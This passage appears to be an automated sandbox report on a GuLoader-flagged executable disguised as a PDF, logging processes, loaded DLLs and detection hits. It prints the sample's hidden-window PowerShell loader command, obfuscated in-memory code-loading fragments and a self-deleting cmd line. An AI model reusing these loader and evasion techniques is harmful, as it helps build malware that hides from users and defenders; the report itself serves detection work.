Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) " Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2547109082.0000000008429000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55qr source: powershell.exe, 00000002.00000002.2544370653.000000000734E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb$ source: powershell.exe, 00000002.00000002.2544370653.00000000073E2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.2547573653.0000000008F0F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kashers $Comdg $pones), (Indkoges @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Prenatalist = [AppDomain]::CurrentDomain.GetAssemblies()$global:Provend =
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Ufordrageligheden)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Coloquintida, $false).DefineType($Uglie
Suspicious powershell command line found
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) " Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_02FB0B5D push edi; retf 2_2_02FB0B62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_02FB12D8 push esp; retf 2_2_02FB12E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_02FB9307 pushfd ; iretd 2_2_02FB9476
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07540757 push cs; iretd 2_2_0754075A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754E767 push cs; iretd 2_2_0754E76A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754A7ED push cs; iretd 2_2_0754A7EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754E7BF push cs; iretd 2_2_0754E7C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_075437AE push cs; iretd 2_2_075437B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07540677 push cs; iretd 2_2_0754067A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754E6C1 push cs; iretd 2_2_0754E6C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_075406FF push cs; iretd 2_2_07540702
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754A6FB push cs; iretd 2_2_0754A6FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07548518 push cs; iretd 2_2_07548652
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754A518 push cs; iretd 2_2_0754A67A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_075465F8 push cs; iretd 2_2_0754678A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754044F push cs; iretd 2_2_07540452
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07540470 push cs; iretd 2_2_0754062E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754946D push cs; iretd 2_2_0754946E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754E418 push cs; iretd 2_2_0754E5EA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754A419 push cs; iretd 2_2_0754A41A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754A4FB push cs; iretd 2_2_0754A4FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754B360 push cs; iretd 2_2_0754B59A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07540309 push cs; iretd 2_2_0754030A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_075403DF push cs; iretd 2_2_075403E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07540391 push cs; iretd 2_2_07540392
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754625D push cs; iretd 2_2_0754625E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07547273 push cs; iretd 2_2_07547276
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07549210 push cs; iretd 2_2_0754937A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_075472DF push cs; iretd 2_2_075472E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754E2C0 push cs; iretd 2_2_0754E3FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07540283 push cs; iretd 2_2_07540286
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Jump to dropped file
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
